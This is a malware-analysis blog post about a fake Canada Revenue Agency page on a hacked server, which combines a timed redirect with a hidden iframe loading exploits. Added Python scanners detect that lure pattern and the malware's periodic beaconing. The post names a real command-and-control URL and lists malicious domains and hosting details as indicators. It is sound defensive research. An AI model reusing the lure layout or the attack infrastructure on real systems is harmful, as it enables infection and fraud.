I found a malicious page placed on a hacked server:
CRA stands for Canada Revenue Agency, as you can see in the page’s source code below:
The meta tag redirects to the Canada Revenue Agency’s website after a few seconds:
But what is the rest of the obfuscated code?
Here is the deobfuscated version (courtesy of Wepawet):
Now we know more about the intent behind this cra.html page. The URL the iframe points to will load multiple exploits:
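The lure combines two pieces that are easy to check for mechanically: a `<meta http-equiv="refresh">` that bounces the visitor to a legitimate site after a delay, and an `<iframe>` (usually sized 1x1 or hidden via CSS) that silently loads the exploit page first. The scanner below is an added example, not code from the original post or from Wepawet; the sample page, its hostnames and the exact attribute values are constructed, since the post does not reproduce the real cra.html markup.

```python
"""Flag the meta-refresh + hidden-iframe pattern described in the post.

Added example; not the post's own code. SAMPLE_HTML is a constructed stand-in
for cra.html and both hostnames are placeholders.
"""
from html.parser import HTMLParser
import re

# Constructed sample page: redirect to a legitimate-looking site after 5 s,
# while a 1x1 hidden iframe pulls content from a second host.
SAMPLE_HTML = """<html><head>
<meta http-equiv="refresh" content="5; url=https://legit-agency.example/">
</head><body>
<h1>Canada Revenue Agency</h1>
<iframe src="http://iframe-host.example/in.php" width="1" height="1" style="visibility:hidden"></iframe>
</body></html>"""


def _dim(value):
    """Leading integer of a width/height attribute; 'unspecified' counts as large."""
    m = re.match(r"\d+", value or "")
    return int(m.group()) if m else 10**6


def _is_hidden(attrs):
    """True when the element is 1x1 (or smaller) or hidden through inline CSS."""
    style = attrs.get("style", "").replace(" ", "").lower()
    tiny = all(_dim(attrs.get(k)) <= 1 for k in ("width", "height"))
    return tiny or "display:none" in style or "visibility:hidden" in style


class LureScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.redirects = []  # (delay_seconds, url)
        self.iframes = []    # (src, hidden?)

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            # content looks like "5; url=https://..." (quotes around the URL are optional)
            m = re.match(r"\s*(\d+)\s*;\s*url\s*=\s*['\"]?([^'\"]+)", a.get("content", ""), re.I)
            if m:
                self.redirects.append((int(m.group(1)), m.group(2).strip()))
        elif tag == "iframe":
            self.iframes.append((a.get("src", ""), _is_hidden(a)))


def scan(html):
    """Return the redirect(s), iframe(s) and a verdict for one HTML document."""
    p = LureScanner()
    p.feed(html)
    return {
        "redirects": p.redirects,
        "iframes": p.iframes,
        # The combination (timed redirect AND a hidden iframe) is the lure signature;
        # either one alone is common on benign pages.
        "suspicious": bool(p.redirects) and any(hidden for _, hidden in p.iframes),
    }


if __name__ == "__main__":
    print(scan(SAMPLE_HTML))
```

The verdict keys on the combination rather than either element alone, because timed meta refreshes and iframes are both common on legitimate pages; a hidden iframe on a page that is about to redirect the user away is what makes this layout a lure.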
I noticed that Google Chrome warned me prior to running the script (which I did anyway for testing purposes):
This is a pretty cool feature that can prevent many infections. Thanks, Google!
Following a successful installation, the malware calls 212.150.164.206/email/gate.php at regular intervals and sends data in what looks like a custom obfuscated form:
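The check-in behaviour described above (the same URL hit at regular intervals) is what a beaconing detector looks for in proxy logs: many requests from one client to one URL whose inter-arrival times barely vary. The detector below is an added example, not code from the original post; the log format and the log lines are constructed, and only the destination IP and path come from the post.

```python
"""Find periodic check-ins (beaconing) to one URL in proxy logs.

Added example; not the post's own code. The log format and SAMPLE_LOG are
constructed. The gate.php destination is the one named in the post.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed log lines: "<ISO timestamp> <client> <method> <url>".
# 10.0.0.5 hits gate.php every ~5 minutes; 10.0.0.7 browses an intranet site irregularly.
SAMPLE_LOG = """\
2011-03-01T10:00:00 10.0.0.5 POST http://212.150.164.206/email/gate.php
2011-03-01T10:00:12 10.0.0.5 GET  http://intranet.example/news
2011-03-01T10:05:01 10.0.0.5 POST http://212.150.164.206/email/gate.php
2011-03-01T10:10:00 10.0.0.5 POST http://212.150.164.206/email/gate.php
2011-03-01T10:15:02 10.0.0.5 POST http://212.150.164.206/email/gate.php
2011-03-01T10:20:00 10.0.0.5 POST http://212.150.164.206/email/gate.php
2011-03-01T10:03:00 10.0.0.7 GET  http://intranet.example/news
2011-03-01T10:31:00 10.0.0.7 GET  http://intranet.example/news
2011-03-01T11:02:00 10.0.0.7 GET  http://intranet.example/news
"""


def parse(log):
    """Yield (timestamp, client, method, url) for each non-empty log line."""
    for line in log.splitlines():
        if not line.strip():
            continue
        ts, client, method, url = line.split()
        yield datetime.fromisoformat(ts), client, method, url


def find_beacons(log, min_hits=4, max_cv=0.1):
    """Return (client, url) series whose inter-request gaps are nearly constant.

    min_hits: minimum number of requests before a series is judged at all.
    max_cv:   maximum coefficient of variation (stdev / mean) of the gaps;
              a value near 0 means the requests are evenly spaced.
    """
    series = defaultdict(list)
    for ts, client, _method, url in parse(log):
        series[(client, url)].append(ts)

    hits = []
    for (client, url), times in series.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg <= 0:  # duplicate timestamps only; nothing periodic to measure
            continue
        cv = pstdev(gaps) / avg
        if cv <= max_cv:
            hits.append({
                "client": client,
                "url": url,
                "hits": len(times),
                "period_s": round(avg),
                "cv": round(cv, 3),
            })
    return hits


if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_LOG):
        print(hit)
```

Real implants add jitter to their sleep interval, so in practice `max_cv` is tuned upward and combined with other signals (a fixed POST body size, a bare-IP host, a URL nobody else in the organisation visits) rather than used on its own.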
Let’s check out the malicious domain: somerandomiframedomain.com
IP: 92.38.232.92
Location: Moscow, Russia
ASN: AS12695 (DINET-AS Digital Network JSC)
Registrar: BIZCN.COM, INC.
Registrant information is bogus (of course):
Ricardo GALENO @austin.co.com
9999999999 fax: 9999999999
1928 BURTON DR 157
Savannah TX 78741
us
Other domain names on that server include:
aecdmkk.cz.cc
analyticgoogle.net
boleslaw.ru
borsteodor.com
facebook-hot.com
facebook-top.com
fbfbvfbfbrgrgr.cz.cc
fruittrust.com
greatkelly.com
iglgxib.cz.cc
lsospawwdfg.cz.cc
nogavitu.net
proderton.com
qpofuyfjhask.cz.cc
tarabona.cz.cc
tha-facebook.com
uasifyufttgas.cz.cc
upsclients.org
upstrack.org
varealestateblog.com
vbnbvhyftdgd.cz.cc
wowldskuydg.cz.cc
yxrenhe.cz.cc
This ASN is deeply involved in hosting CnC servers and other bot-related activities:
Google Safe Browsing
malc0de.com
At this moment, I am not sure what the connection (if any) between the malware and the Canada Revenue Agency is.
Here are a couple of VirusTotal reports from some of the binaries that were dropped. VT1, VT2.
Jerome Segura